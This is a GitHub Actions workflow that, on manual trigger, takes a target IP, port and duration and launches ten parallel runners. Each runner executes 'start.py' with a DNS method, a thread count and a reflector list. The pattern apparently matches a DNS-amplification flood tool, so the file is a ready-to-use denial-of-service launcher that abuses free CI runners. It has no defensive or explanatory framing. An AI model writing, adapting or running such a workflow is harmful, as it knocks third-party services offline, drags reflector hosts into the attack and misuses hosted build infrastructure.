name: Run DNS Task

on:
  workflow_dispatch:
    inputs:
      ip:
        description: "IP address target"
        required: true
        type: string
      port:
        description: "Port target"
        required: true
        type: string
      time:
        description: "Execution time in seconds"
        required: true
        type: string

jobs:
  run-dns:
    runs-on: ubuntu-latest

    strategy:
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
      fail-fast: false  # để các job khác không bị dừng nếu 1 job fail

    steps:
      - name: Checkout repository
        uses: actions/checkout@v4

      - name: Install Python dependencies
        run: |
          sudo pip install --break-system-packages --ignore-installed -r requirements.txt

      - name: Run DNS task (Instance #${{ matrix.instance }})
        run: |
          echo "Starting instance ${{ matrix.instance }}"
          sudo python3 start.py DNS "${{ github.event.inputs.ip }}:${{ github.event.inputs.port }}" 445 "${{ github.event.inputs.time }}" "vn.txt"
